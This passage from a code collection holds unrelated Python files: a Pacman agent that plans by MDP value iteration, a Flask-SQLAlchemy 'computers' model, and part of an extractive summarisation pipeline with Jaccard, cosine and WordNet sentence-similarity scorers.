        self.width = width
        self.height = height
        for m in range(self.height):
            row = []
            for n in range(self.width):
                row.append(0)
            subgrid.append(row)
        self.grid = subgrid
    # Sets value of (m,n); note the (x, y) -> grid[y][x] index swap.
    def setVal(self, m, n, value):
        self.grid[n][m] = value
    # Returns value of (m,n); same index swap as setVal.
    def getVal(self, m, n):
        return self.grid[n][m]
    def getHeight(self):
        return self.height
    def getWidth(self):
        return self.width
    # Prints the grid with row 0 at the bottom (Pacman's coordinate system).
    def display(self):
        for m in range(self.height):
            for n in range(self.width):
                print self.grid[self.height - m - 1][n],
            print
        print
# Finds the best move for pacman at each of pacman's states by calculating their utilities
class MDPAgent(Agent):
    """Pacman agent choosing moves by value iteration over an MDP maze model.

    Rewards: food and capsules are worth 100, squares holding a ghost -100,
    everything else 0 plus a per-step living cost.  Movement is stochastic:
    0.8 probability of the intended direction and 0.1 for each perpendicular
    direction; a move into a wall leaves Pacman where he is.

    Improvements over the previous revision: the four-direction expected
    utility computation (duplicated verbatim in `transition` and `policy`)
    now lives in one private helper; `policy` no longer relies on the
    Python-2-only `dict.keys()[...]` indexing; and `getAction` computes the
    policy once instead of up to four times.
    """

    def __init__(self):
        print("Starting up MDPAgent!")
        self.VisitedCoords = []  # coordinates Pacman has already visited
        self.MapOfFood = []      # known food coordinates
        self.MapOfCaps = []      # known capsule coordinates
        self.MapOfWalls = []     # known wall coordinates

    def registerInitialState(self, state):
        """Run once per game, after game state exists: build the map grid."""
        print("Running registerInitialState for MDPAgent!")
        print("I'm at:")
        print(api.whereAmI(state))
        self.makeMap(state)
        self.addWalls(state)
        self.map.display()

    def final(self, state):
        """Reset cached world knowledge so the next game starts fresh."""
        print("Looks like the game just ended!")
        self.VisitedCoords = []
        self.MapOfFood = []
        self.MapOfCaps = []
        self.MapOfWalls = []

    def makeMap(self, state):
        """Create a Grid matching the layout's dimensions."""
        corners = api.corners(state)
        self.map = Grid(self.widthOfLayout(corners), self.heightOfLayout(corners))

    def heightOfLayout(self, corners):
        """Layout height: max corner y + 1 (indices start at 0)."""
        return max(corner[1] for corner in corners) + 1

    def widthOfLayout(self, corners):
        """Layout width: max corner x + 1 (indices start at 0)."""
        return max(corner[0] for corner in corners) + 1

    def addWalls(self, state):
        """Mark every wall coordinate on the display grid with 'W'."""
        for wall in api.walls(state):
            self.map.setVal(wall[0], wall[1], "W")

    def makeMapWithValues(self, state):
        """Return a dict mapping every coordinate to its reward value.

        Food/capsules get 100, walls 'W', ghost squares -100, and every
        other (or already-eaten) square 0.
        """
        pacLoc = api.whereAmI(state)
        corners = api.corners(state)
        ghosts = api.ghosts(state)

        # Remember everything seen so far (the api only reports what is
        # currently observable).
        if pacLoc not in self.VisitedCoords:
            self.VisitedCoords.append(pacLoc)
        for food in api.food(state):
            if food not in self.MapOfFood:
                self.MapOfFood.append(food)
        for cap in api.capsules(state):
            if cap not in self.MapOfCaps:
                self.MapOfCaps.append(cap)
        for wall in api.walls(state):
            if wall not in self.MapOfWalls:
                self.MapOfWalls.append(wall)

        # Seed the value map from the remembered food/capsules/walls.
        mapWithValues = {}
        mapWithValues.update(dict.fromkeys(self.MapOfFood, 100))
        mapWithValues.update(dict.fromkeys(self.MapOfCaps, 100))
        mapWithValues.update(dict.fromkeys(self.MapOfWalls, 'W'))

        # Any remaining coordinate defaults to 0.
        for x in range(self.widthOfLayout(corners) - 1):
            for y in range(self.heightOfLayout(corners) - 1):
                if (x, y) not in mapWithValues:
                    mapWithValues[(x, y)] = 0

        # Food/capsules Pacman has already eaten are worth nothing.
        for food in self.MapOfFood:
            if food in self.VisitedCoords:
                mapWithValues[food] = 0
        for cap in self.MapOfCaps:
            if cap in self.VisitedCoords:
                mapWithValues[cap] = 0

        # Squares currently occupied by a ghost are strongly penalised.
        for coord in mapWithValues.keys():
            for ghost in ghosts:
                if (int(ghost[0]), int(ghost[1])) == coord:
                    mapWithValues[coord] = -100
        return mapWithValues

    def _directionalUtilities(self, valueMap, location):
        """Expected utility of moving N/E/S/W from `location`.

        Motion model: 0.8 intended direction, 0.1 for each perpendicular
        direction; ending up in a wall means staying put.
        """
        x, y = location
        north, east = (x, y + 1), (x + 1, y)
        south, west = (x, y - 1), (x - 1, y)

        def outcome(cell):
            # Value of landing in `cell`; bouncing off a wall means staying.
            return valueMap[location] if valueMap[cell] == "W" else valueMap[cell]

        return {
            "NorthUtility": outcome(north) * 0.8 + outcome(east) * 0.1 + outcome(west) * 0.1,
            "EastUtility": outcome(east) * 0.8 + outcome(north) * 0.1 + outcome(south) * 0.1,
            "SouthUtility": outcome(south) * 0.8 + outcome(east) * 0.1 + outcome(west) * 0.1,
            "WestUtility": outcome(west) * 0.8 + outcome(north) * 0.1 + outcome(south) * 0.1,
        }

    def transition(self, m, n, mapWithValues):
        """Replace the value at (m, n) with its maximum expected utility
        and return it (the transition term of the Bellman backup)."""
        self.mapWithValues = mapWithValues
        self.m = m
        self.n = n
        self.utilityDictionary = self._directionalUtilities(mapWithValues, (m, n))
        self.mapWithValues[(m, n)] = max(self.utilityDictionary.values())
        return self.mapWithValues[(m, n)]

    def valueIterationForSmallGrid(self, state, reward, discountFunction, mapWithValues):
        """Run 100 Bellman-update sweeps over the small grid."""
        food = api.food(state)
        caps = api.capsules(state)
        corners = api.corners(state)
        walls = api.walls(state)
        ghosts = api.ghosts(state)
        width = self.widthOfLayout(corners) - 1
        height = self.heightOfLayout(corners) - 1

        for _ in range(100):  # fixed sweep count; enough to converge here
            for x in range(width):
                for y in range(height):
                    if (x, y) not in food and (x, y) not in caps and (x, y) not in walls and (x, y) not in ghosts:
                        previous = mapWithValues.copy()  # values before this update
                        mapWithValues[(x, y)] = reward + discountFunction * self.transition(x, y, previous)

    def valueIterationForMediumClassic(self, state, reward, discountFunction, mapWithValues):
        """Run 100 Bellman-update sweeps on the mediumClassic layout.

        Food further than 5 squares from every ghost keeps its raw value and
        is excluded from the sweep, saving time without making Pacman shun
        food merely because a ghost is in the vicinity.
        """
        food = api.food(state)
        caps = api.capsules(state)
        corners = api.corners(state)
        walls = api.walls(state)
        ghosts = api.ghosts(state)
        width = self.widthOfLayout(corners) - 1
        height = self.heightOfLayout(corners) - 1

        # Coordinates up to 5 squares N/E/S/W of a ghost still get iterated.
        # NOTE(review): the membership tests use a fixed +/-1 offset while the
        # appends use the loop offset; preserved exactly as before.
        foodUtilities = []
        for offset in range(0, 5):
            for ghost in ghosts:
                gx, gy = int(ghost[0]), int(ghost[1])
                if (gx, gy + 1) not in foodUtilities:   # north of the ghost
                    foodUtilities.append((gx, gy + offset))
                if (gx + 1, gy) not in foodUtilities:   # east of the ghost
                    foodUtilities.append((gx + offset, gy))
                if (gx, gy - 1) not in foodUtilities:   # south of the ghost
                    foodUtilities.append((gx, gy - offset))
                if (gx - 1, gy) not in foodUtilities:   # west of the ghost
                    foodUtilities.append((gx - offset, gy))

        # Uneaten food far from every ghost keeps its value untouched.
        skip = [item for item in food if item not in foodUtilities]

        for _ in range(100):  # bounded sweeps so we do not waste move time
            for x in range(width):
                for y in range(height):
                    if (x, y) not in ghosts and (x, y) not in caps and (x, y) not in walls and (x, y) not in skip:
                        previous = mapWithValues.copy()
                        # Rounded to int so the displayed value map stays readable.
                        mapWithValues[(x, y)] = int(reward + (discountFunction * self.transition(x, y, previous)))

    def policy(self, state, iterationMap):
        """Return the move name ('NorthUtility', ...) with the maximum
        expected utility from Pacman's current position."""
        pac = api.whereAmI(state)
        self.mapWithValues = iterationMap
        self.utilityDictionary = self._directionalUtilities(iterationMap, (pac[0], pac[1]))
        # First key reaching the maximum, matching the old list-index
        # behaviour (and working on both Python 2 and 3).
        meu = max(self.utilityDictionary.values())
        for move in self.utilityDictionary:
            if self.utilityDictionary[move] == meu:
                return move

    def getAction(self, state):
        """Run value iteration for the current state; return the best legal move."""
        self.map.display()
        legal = api.legalActions(state)
        corners = api.corners(state)
        width = self.widthOfLayout(corners) - 1
        height = self.heightOfLayout(corners) - 1
        mapOfValues = self.makeMapWithValues(state)  # fresh rewards each turn

        # Pick the iteration variant matching the layout size.
        if width < 10 and height < 10:
            self.valueIterationForSmallGrid(state, (-0.3), 1, mapOfValues)
        else:
            self.valueIterationForMediumClassic(state, (-0.5), 1, mapOfValues)

        # Mirror the iterated utilities onto the display grid.
        for x in range(self.map.getWidth()):
            for y in range(self.map.getHeight()):
                if self.map.getVal(x, y) != "W":
                    self.map.setVal(x, y, mapOfValues[(x, y)])

        # Compute the policy once (previously recomputed per comparison).
        best = self.policy(state, mapOfValues)
        if best == "NorthUtility":
            return api.makeMove(Directions.NORTH, legal)
        if best == "EastUtility":
            return api.makeMove(Directions.EAST, legal)
        if best == "SouthUtility":
            return api.makeMove(Directions.SOUTH, legal)
        if best == "WestUtility":
            return api.makeMove(Directions.WEST, legal)
|
10,553 | 08097d4784d145365781cf7fdbdab11959b4b54b | """Alchemy - Flask."""
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
# "postgresql://" is the canonical dialect name; the legacy "postgres://"
# alias was removed in SQLAlchemy 1.4 and raises "Can't load plugin" there,
# while "postgresql://" works on every version.
app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://localhost/computers-db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False  # silence tracking overhead warning
db = SQLAlchemy(app)
class Computer(db.Model):
    """One computer record; all SQLAlchemy models derive from db.Model."""

    # Without this the table name would default to the model's name.
    __tablename__ = "computers"

    # Surrogate primary key plus the two data columns.
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.Text)
    memory_in_gb = db.Column(db.Integer)

    def __init__(self, name, memory_in_gb):
        """Populate one row; the id column is assigned by the database."""
        self.name = name
        self.memory_in_gb = memory_in_gb

    def __repr__(self):
        """Human-readable form shown when an instance is printed in a REPL."""
        template = "This {} has {} GB of memory"
        return template.format(self.name, self.memory_in_gb)
|
10,554 | b7cb9b11b94b80cce8944306068e410d4a79a833 | ##########################################################################################################################################
#Required Modules
import re,os,sys
WORD = re.compile(r'\w+')
import string
import math
import time
import collections
import nltk
from nltk.corpus import stopwords
from collections import Counter
from nltk.corpus import wordnet as wn
from nltk.corpus import brown
import numpy as np
from nltk.stem.porter import *
############################################################################################################################################
#THRESHOLDS
class THRESHOLDS:
    """Tuning constants shared across the summarisation pipeline."""

    # Used by the scorers.
    TFIDFThreshold = 0.0

    # Used by the stack decoder.
    MAXIMUM_LENGTH_SUMMARY_ALLOWED = 100
    MINIMUM_LENGTH_SENTENCE_ALLOWED = 6
    SIMILARITY_BOUND = 0.5
class PROVIDE_ID:
    """Hands out sequential ids for topics, documents and sentences.

    Counters live on the class itself, so ids are unique process-wide;
    the first id issued by each getter is 0.
    """

    topic_id_no = -1
    doc_id_no = -1
    sen_id_no = -1

    @staticmethod
    def getNexttopic_id_no():
        """Return the next unused topic id."""
        PROVIDE_ID.topic_id_no += 1
        return PROVIDE_ID.topic_id_no

    @staticmethod
    def getNextdoc_id_no():
        """Return the next unused document id."""
        PROVIDE_ID.doc_id_no += 1
        return PROVIDE_ID.doc_id_no

    @staticmethod
    def getNextsen_id_no():
        """Return the next unused sentence id."""
        PROVIDE_ID.sen_id_no += 1
        return PROVIDE_ID.sen_id_no
###########################################################################################################################################
#Similarity_Score
class SIMILARITY_SCORE:
    """Abstract base for sentence-similarity scorers."""

    def __init__(self):
        pass

    def get_score(self, sentence1, sentence2):
        """Return a similarity score for two sentences; subclasses override."""
        raise NotImplementedError("Subclass must implement abstract method")


class Jaccard_Similarity(SIMILARITY_SCORE):
    """Jaccard similarity over the sets of distinct words in two sentences."""

    def __init__(self):
        pass

    def text_to_vector(self, list_of_words):
        """Return a Counter of word frequencies (only the key set is used)."""
        return Counter(list_of_words)

    def get_score(self, sentence1, sentence2):
        """Return |w1 & w2| / |w1 | w2| in [0.0, 1.0].

        Fix: returns 0.0 when both sentences are empty instead of raising
        ZeroDivisionError on an empty union.
        """
        words1 = set(self.text_to_vector(sentence1.getList_of_words()).keys())
        words2 = set(self.text_to_vector(sentence2.getList_of_words()).keys())
        union = words1 | words2
        if not union:
            return 0.0
        return len(words1 & words2) / len(union)
class TF_IDF_Similarity(SIMILARITY_SCORE):
    """Cosine similarity between the term-frequency vectors of two sentences."""

    def __init__(self):
        pass

    def text_to_vector(self, list_of_words):
        """Map a word list to its term-frequency Counter."""
        return Counter(list_of_words)

    def get_cosine(self, vec1, vec2):
        """Return cos(vec1, vec2), or 0.0 when either vector has zero norm."""
        shared_terms = set(vec1.keys()) & set(vec2.keys())
        dot_product = sum(vec1[term] * vec2[term] for term in shared_terms)
        norm1 = math.sqrt(sum(count ** 2 for count in vec1.values()))
        norm2 = math.sqrt(sum(count ** 2 for count in vec2.values()))
        denominator = norm1 * norm2
        if not denominator:
            return 0.0
        return float(dot_product) / denominator

    def get_score(self, sentence1, sentence2):
        """Cosine similarity of the two sentences' word-count vectors."""
        vec1 = self.text_to_vector(sentence1.getList_of_words())
        vec2 = self.text_to_vector(sentence2.getList_of_words())
        return self.get_cosine(vec1, vec2)
class WORD_NET_SIMILARITY(SIMILARITY_SCORE):
    """WordNet-based sentence similarity combining semantic and word-order scores.

    Requires NLTK's WordNet (`wn`) and Brown corpus (`brown`) to be available.
    The final score is DELTA * semantic_similarity + (1 - DELTA) * word_order_similarity.
    """
    def __init__(self):
        # Tuning constants: DELTA weights semantic vs word-order similarity;
        # ALPHA/BETA shape the path-length / depth decay curves; ETA and PHI
        # are similarity thresholds for word-order and semantic vectors.
        self.DELTA = 0.85
        self.ALPHA = 0.2
        self.BETA = 0.45
        self.ETA = 0.4
        self.PHI = 0.2
        # Lazily-built Brown-corpus word frequencies (see info_content).
        self.brown_freqs = dict()
        self.N = 0
    ######################### word similarity ##########################
    def get_best_synset_pair(self,word_1, word_2):
        """
        Choose the pair with highest path similarity among all pairs.
        Mimics pattern-seeking behavior of humans.
        """
        max_sim = -1.0
        synsets_1 = wn.synsets(word_1)
        synsets_2 = wn.synsets(word_2)
        if len(synsets_1) == 0 or len(synsets_2) == 0:
            # At least one word is unknown to WordNet.
            return None, None
        else:
            max_sim = -1.0
            best_pair = None, None
            for synset_1 in synsets_1:
                for synset_2 in synsets_2:
                    sim = wn.path_similarity(synset_1, synset_2)
                    if sim is not None and sim > max_sim:
                        max_sim = sim
                        best_pair = synset_1, synset_2
            return best_pair
    def length_dist(self,synset_1, synset_2):
        """
        Return a measure of the length of the shortest path in the semantic
        ontology (Wordnet in our case as well as the paper's) between two
        synsets.
        """
        l_dist = sys.maxsize
        if synset_1 is None or synset_2 is None:
            return 0.0
        if synset_1 == synset_2:
            # if synset_1 and synset_2 are the same synset return 0
            l_dist = 0.0
        else:
            wset_1 = set([str(x.name()) for x in synset_1.lemmas()])
            wset_2 = set([str(x.name()) for x in synset_2.lemmas()])
            if len(wset_1.intersection(wset_2)) > 0:
                # if synset_1 != synset_2 but there is word overlap, return 1.0
                l_dist = 1.0
            else:
                # just compute the shortest path between the two
                l_dist = synset_1.shortest_path_distance(synset_2)
                if l_dist is None:
                    l_dist = 0.0
        # normalize path length to the range [0,1]
        return math.exp(-self.ALPHA * l_dist)
    def hierarchy_dist(self,synset_1, synset_2):
        """
        Return a measure of depth in the ontology to model the fact that
        nodes closer to the root are broader and have less semantic similarity
        than nodes further away from the root.
        """
        h_dist = sys.maxsize
        if synset_1 is None or synset_2 is None:
            return h_dist
        if synset_1 == synset_2:
            # return the depth of one of synset_1 or synset_2
            h_dist = max([x[1] for x in synset_1.hypernym_distances()])
        else:
            # find the max depth of least common subsumer
            hypernyms_1 = {x[0]:x[1] for x in synset_1.hypernym_distances()}
            hypernyms_2 = {x[0]:x[1] for x in synset_2.hypernym_distances()}
            lcs_candidates = set(hypernyms_1.keys()).intersection(
                set(hypernyms_2.keys()))
            if len(lcs_candidates) > 0:
                lcs_dists = []
                for lcs_candidate in lcs_candidates:
                    lcs_d1 = 0
                    if lcs_candidate in hypernyms_1.keys():
                        lcs_d1 = hypernyms_1[lcs_candidate]
                    lcs_d2 = 0
                    if lcs_candidate in hypernyms_2.keys():
                        lcs_d2 = hypernyms_2[lcs_candidate]
                    lcs_dists.append(max([lcs_d1, lcs_d2]))
                h_dist = max(lcs_dists)
            else:
                h_dist = 0
        # tanh(BETA * h_dist), written out explicitly.
        return ((math.exp(self.BETA * h_dist) - math.exp(-self.BETA * h_dist)) /
            (math.exp(self.BETA * h_dist) + math.exp(-self.BETA * h_dist)))
    def word_similarity(self,word_1, word_2):
        # Product of the path-length and depth contributions for the best pair.
        synset_pair = self.get_best_synset_pair(word_1, word_2)
        return (self.length_dist(synset_pair[0], synset_pair[1]) *
            self.hierarchy_dist(synset_pair[0], synset_pair[1]))
    ######################### sentence similarity ##########################
    def most_similar_word(self,word, word_set):
        """
        Find the word in the joint word set that is most similar to the word
        passed in. We use the algorithm above to compute word similarity between
        the word and each word in the joint word set, and return the most similar
        word and the actual similarity value.
        """
        max_sim = -1.0
        sim_word = ""
        for ref_word in word_set:
            sim = self.word_similarity(word, ref_word)
            if sim > max_sim:
                max_sim = sim
                sim_word = ref_word
        return sim_word, max_sim
    def info_content(self,lookup_word):
        """
        Uses the Brown corpus available in NLTK to calculate a Laplace
        smoothed frequency distribution of words, then uses this information
        to compute the information content of the lookup_word.
        """
        if self.N == 0:
            # poor man's lazy evaluation
            for sent in brown.sents():
                for word in sent:
                    word = word.lower()
                    if not word in self.brown_freqs.keys():
                        self.brown_freqs[word] = 0
                    self.brown_freqs[word] = self.brown_freqs[word] + 1
                    self.N = self.N + 1
        lookup_word = lookup_word.lower()
        n = 0 if not lookup_word in self.brown_freqs.keys() else self.brown_freqs[lookup_word]
        return 1.0 - (math.log(n + 1) / math.log(self.N + 1))
    def semantic_vector(self,words, joint_words, info_content_norm):
        """
        Computes the semantic vector of a sentence. The sentence is passed in as
        a collection of words. The size of the semantic vector is the same as the
        size of the joint word set. The elements are 1 if a word in the sentence
        already exists in the joint word set, or the similarity of the word to the
        most similar word in the joint word set if it doesn't. Both values are
        further normalized by the word's (and similar word's) information content
        if info_content_norm is True.
        """
        sent_set = set(words)
        semvec = np.zeros(len(joint_words))
        i = 0
        for joint_word in joint_words:
            if joint_word in sent_set:
                # if word in union exists in the sentence, s(i) = 1 (unnormalized)
                semvec[i] = 1.0
                if info_content_norm:
                    semvec[i] = semvec[i] * math.pow(self.info_content(joint_word), 2)
            else:
                # find the most similar word in the joint set and set the sim value
                sim_word, max_sim = self.most_similar_word(joint_word, sent_set)
                # NOTE(review): the paper's formulation assigns max_sim here when it
                # clears the threshold, not the constant PHI — verify intent.
                semvec[i] = self.PHI if max_sim > self.PHI else 0.0
                if info_content_norm:
                    semvec[i] = semvec[i] * self.info_content(joint_word) * self.info_content(sim_word)
            i = i + 1
        return semvec
    def semantic_similarity(self,sentence_1, sentence_2, info_content_norm):
        """
        Computes the semantic similarity between two sentences as the cosine
        similarity between the semantic vectors computed for each sentence.
        """
        words_1 = sentence_1.getList_of_words()
        words_2 = sentence_2.getList_of_words()
        joint_words = set(words_1).union(set(words_2))
        vec_1 = self.semantic_vector(words_1, joint_words, info_content_norm)
        vec_2 = self.semantic_vector(words_2, joint_words, info_content_norm)
        return np.dot(vec_1, vec_2.T) / (np.linalg.norm(vec_1) * np.linalg.norm(vec_2))
    ######################### word order similarity ##########################
    def word_order_vector(self,words, joint_words, windex):
        """
        Computes the word order vector for a sentence. The sentence is passed
        in as a collection of words. The size of the word order vector is the
        same as the size of the joint word set. The elements of the word order
        vector are the position mapping (from the windex dictionary) of the
        word in the joint set if the word exists in the sentence. If the word
        does not exist in the sentence, then the value of the element is the
        position of the most similar word in the sentence as long as the similarity
        is above the threshold self.ETA.
        """
        wovec = np.zeros(len(joint_words))
        i = 0
        wordset = set(words)
        for joint_word in joint_words:
            if joint_word in wordset:
                # word in joint_words found in sentence, just populate the index
                wovec[i] = windex[joint_word]
            else:
                # word not in joint_words, find most similar word and populate
                # word_vector with the thresholded similarity
                sim_word, max_sim = self.most_similar_word(joint_word, wordset)
                if max_sim > self.ETA:
                    wovec[i] = windex[sim_word]
                else:
                    wovec[i] = 0
            i = i + 1
        return wovec
    def word_order_similarity(self,sentence_1, sentence_2):
        """
        Computes the word-order similarity between two sentences as the normalized
        difference of word order between the two sentences.
        """
        words_1 = sentence_1.getList_of_words()
        words_2 = sentence_2.getList_of_words()
        joint_words = list(set(words_1).union(set(words_2)))
        windex = {x[1]: x[0] for x in enumerate(joint_words)}
        r1 = self.word_order_vector(words_1, joint_words, windex)
        r2 = self.word_order_vector(words_2, joint_words, windex)
        return 1.0 - (np.linalg.norm(r1 - r2) / np.linalg.norm(r1 + r2))
    ######################### overall similarity ##########################
    def get_score(self,sentence_1, sentence_2):
        """
        Calculate the semantic similarity between two sentences. The last
        parameter is True or False depending on whether information content
        normalization is desired or not.
        """
        return self.DELTA * self.semantic_similarity(sentence_1, sentence_2, True) + (1.0 - self.DELTA) * self.word_order_similarity(sentence_1, sentence_2)
#############################################################################################################################################
#Models
class Sentence:
    """A single tokenized sentence together with its ids, position and score.

    Holds both the raw text (`actual_sentence`) and the token list used by
    the similarity and importance scorers.
    """
    def __init__(self, sen_id_no, senLength, list_of_words, actual_sentence, location_in_sentence, doc_id_no):
        self.score = 0
        self.sen_id_no = sen_id_no
        self.sentenceLength = senLength
        #self.list_of_words = self.preProcess(list_of_words)
        self.list_of_words = list_of_words
        self.actual_sentence = actual_sentence
        self.location_in_sentence = location_in_sentence
        self.doc_id_no = doc_id_no
        self.partOfHumanSummary = False
        # BUGFIX: the original stored this flag as `self.isPositiveSample`,
        # which shadowed the isPositiveSample() method and made it uncallable.
        self.positiveSample = False
    def setActual_sentence(self, actual_sentence):
        self.actual_sentence = actual_sentence
    def isPartOfHumanSummary(self):
        return self.partOfHumanSummary
    def setPartOfHumanSummary(self, value):
        self.partOfHumanSummary = value
    def getLocation_in_sentence(self):
        return self.location_in_sentence
    def setLocation_in_sentence(self, location_in_sentence):
        self.location_in_sentence = location_in_sentence
    def getdoc_id_no(self):
        return self.doc_id_no
    def getList_of_words(self):
        return self.list_of_words
    def getScore(self):
        return self.score
    def setScore(self, score):
        self.score = score
    def getActual_sentence(self):
        return self.actual_sentence
    def isPositiveSample(self):
        return self.positiveSample
    def setPositiveSample(self, isPositiveSample):
        self.positiveSample = isPositiveSample
    def getSentenceLength(self):
        return self.sentenceLength
    def getId(self):
        # Sentence id rendered as a string.
        return str(self.sen_id_no)
    def toString(self):
        return self.getActual_sentence() + " - " + str(self.getScore())
    def preProcess(self, list_of_words):
        """Stopword-filter and stem the token list (requires NLTK; currently unused)."""
        stemmer = PorterStemmer()
        result = []
        for word in list_of_words:
            if word not in stopwords.words('english'):
                result.append(stemmer.stem(word))
        return result
class Document:
    """Ordered collection of Sentence objects parsed from one source file."""
    def __init__(self, sentences=None, filename="", doc_id_no=0):
        # BUGFIX: the original used a mutable default argument (sentences=[]),
        # so every Document created without an explicit list shared — and
        # accumulated sentences into — the same list object.
        self.sentences = [] if sentences is None else sentences
        self.filename = filename
        self.doc_id_no = doc_id_no
    def addSentence(self, sentence):
        self.sentences.append(sentence)
    def getSentences(self):
        return self.sentences
    def getdoc_id_no(self):
        return self.doc_id_no
    def getNumberOfSentences(self):
        return len(self.sentences)
class Summary(Document):
    """A Document holding a summary; `isHuman` marks human-written (gold) summaries."""
    def __init__(self, filename=None, doc_id_no=0, isHuman=False):
        if filename is not None:
            super().__init__(SentenceProcessor.getSentences(filename, doc_id_no), filename, doc_id_no)
        else:
            # BUGFIX: the original skipped the base initializer when no
            # filename was given, leaving sentences/filename/doc_id_no unset.
            super().__init__([], "", doc_id_no)
        # Plain attribute. The original also declared an isHuman() method,
        # but this attribute shadowed it so the method was never reachable;
        # the dead method has been removed.
        self.isHuman = isHuman
class Topic:
    """Groups the source documents and their summaries that share one topic id."""
    def __init__(self, filename=None, topic_id_no=123456):
        self.summaries = []
        # Maps sentence id -> Sentence, filled in by SentenceProcessor.
        self.sentenceMap = {}
        if filename is None:
            self.documents = []
        else:
            self.documents = SentenceProcessor.getDocuments(filename, self.sentenceMap)
        self.topic_id_no = topic_id_no
    def getSentenceMap(self):
        return self.sentenceMap
    def addDocument(self, doc):
        self.documents.append(doc)
    def getDocuments(self):
        return self.documents
    def addSummary(self, summary):
        self.summaries.append(summary)
    def getSummaries(self):
        return self.summaries
    def gettopic_id_no(self):
        return self.topic_id_no
class DataSet:
    """Loads a directory of topic files into Topic objects.

    Files with extension `.txt` are parsed as topic source documents and
    `.sum` files are attached to their topic (matched by base filename) as
    human summaries. Relies on the global PROVIDE_ID counters.
    """
    def __init__(self,dirPath=None):
        # topic name -> Topic
        self.topicMap={}
        # topic id -> topic name (reverse lookup)
        self.nameMap={}
        self.simScorer = TF_IDF_Similarity()
        self.EXT_SUMMARY = "sum"
        self.EXT_SOURCE = "txt"
        if dirPath is not None:
            topic_id_no=0
            files = self.getFiles(dirPath)
            t = None
            s = None
            #Process Topics
            # First pass: build a Topic from every source (.txt) file.
            # NOTE(review): paths are split on '/' — presumably POSIX-only;
            # confirm before running on Windows.
            for file in files:
                fname = file.split('/')
                fname = fname[-1]
                fname = fname.split('.')
                file_name = fname[0]
                extension = fname[-1]
                if(extension == self.EXT_SOURCE):
                    print("Processing: " + file)
                    topic_id_no = PROVIDE_ID.getNexttopic_id_no()
                    t = Topic(file, topic_id_no)
                    topic = file_name
                    self.topicMap[topic] = t
                    self.nameMap[topic_id_no] = topic
            #Add Summaries
            # Second pass: attach each .sum file to the Topic with the same
            # base name (raises KeyError if the matching .txt was missing).
            for file in files:
                fname = file.split('/')
                fname = fname[-1]
                fname = fname.split('.')
                file_name = fname[0]
                extension = fname[-1]
                if(extension == self.EXT_SUMMARY):
                    print("Processing: " + file)
                    s = Summary(file, PROVIDE_ID.getNextdoc_id_no(), True);
                    topic = file_name
                    t = self.topicMap[topic]
                    t.addSummary(s);
    def getFiles(self,path):
        # All .txt/.sum files in `path`, sorted by base name so the two
        # passes above see a deterministic order.
        files = [f for f in os.listdir(path) if (f.endswith(self.EXT_SOURCE) or f.endswith(self.EXT_SUMMARY))]
        fileNames = sorted(files, key=lambda y: (y.rsplit('.')[0]))
        result = [os.path.join(path,f) for f in fileNames]
        return result
    def calculateImportanceScores(self,weights):
        """Score every sentence in every document and summary using ImportanceModule."""
        for t in self.topicMap.values():
            totalSet = []
            for doc in t.getDocuments():
                totalSet.append(doc)
            for summary in t.getSummaries():
                totalSet.append(summary)
            impModule = ImportanceModule(totalSet)
            impModule.setWeightsForImpScorers(weights)
            impModule.setValues(totalSet)
    def getTopicMapSize(self):
        return len(self.topicMap)
    def getTopic(self, key):
        return self.topicMap[key]
    def getTopicName(self,topic_id_no):
        return self.nameMap[topic_id_no]
    def getTopicMap(self):
        return self.topicMap
    def getTopics(self):
        # All Topic objects (insertion order of topicMap).
        res = []
        for t in self.topicMap.values():
            res.append(t)
        return res
    def getTopicNames(self):
        res = []
        for t in self.topicMap.keys():
            res.append(t)
        return res
############################################################################################################################################
#Sentence Preprocessor
class SentenceProcessor:
    """Parses the tagged corpus format into Sentence/Document objects.

    The input format marks each sentence with a "Sentence:" line followed by
    one token per line prefixed with "\tS:"; a lone "#" token terminates a
    document (getDocuments only).
    """
    SENTENCE_MARKER = "Sentence:"
    WORD_MARKER = "\tS:"
    # Single-character tokens dropped as punctuation.
    PUNCTUATION = "\"'`!?&_/\\);][<>~@-({}:"
    TERMINAL = "#"
    @staticmethod
    def getDocuments(filename,sentenceMap):
        """Parse `filename` into a list of Documents, registering each Sentence in sentenceMap."""
        documents = []
        sentences = []
        lineNum=0
        doc_id_no = PROVIDE_ID.getNextdoc_id_no()
        f = open(filename, "r")
        text = None
        noSpace = False
        text = f.readline()
        while(text is not None and text.strip() == SentenceProcessor.SENTENCE_MARKER):
            #Sentence starts
            senLength=0
            sb = ""
            list_of_words= []
            lineNum = lineNum+1
            while (text is not None):
                text = f.readline()
                if(text is not None and not (text =="") and not (text.strip()==SentenceProcessor.SENTENCE_MARKER)):
                    if(not text.startswith(SentenceProcessor.WORD_MARKER)):
                        continue
                    word = text.split("S: ")[1]
                    word = word.replace('\n','')
                    #filter spurious chars
                    if word in SentenceProcessor.PUNCTUATION:
                        continue
                    else:
                        # "," and "." are appended without a preceding space.
                        if(word == ",") or (word == "."):
                            noSpace=True
                        if word.strip()==SentenceProcessor.TERMINAL:
                            #Document ends
                            d = Document(sentences, filename, doc_id_no)
                            documents.append(d)
                            lineNum=0
                            sentences = []
                            doc_id_no = PROVIDE_ID.getNextdoc_id_no()
                            text = f.readline()
                            break
                        cWord = ""
                        if '-' in word:
                            splitted = word.split("-")
                            # NOTE(review): a hyphenated token still counts as
                            # one word toward senLength — confirm intent.
                            senLength = senLength+1
                            for cword in splitted:
                                # BUGFIX: the original replaced on `word` (the
                                # whole token) instead of the piece `cword`,
                                # appending the full token once per piece.
                                cWord = cword.replace("\\W", "")
                                if len(cWord)>0:
                                    list_of_words.append(cWord)
                        else:
                            cWord = word.replace("\\W", "")
                            if len(cWord)>0:
                                senLength = senLength+1
                                list_of_words.append(cWord)
                        # Rebuild the display string, honoring noSpace.
                        if len(sb)== 0:
                            sb += word
                        else:
                            if noSpace:
                                noSpace = False
                                sb += word
                            else:
                                sb+=' '
                                sb += word
                else:
                    break
            if(len(list_of_words)>0 and len(sb)>0):
                id_no = PROVIDE_ID.getNextsen_id_no()
                s = Sentence(id_no, senLength, list_of_words, sb, lineNum, doc_id_no)
                sentences.append(s)
                sentenceMap[id_no] = s
        return documents
    @staticmethod
    def getSentences(filename,doc_id_no):
        """Parse `filename` into a flat list of Sentences flagged as human-summary members."""
        sentences = []
        lineNum=0
        f = open(filename, "r")
        text = None
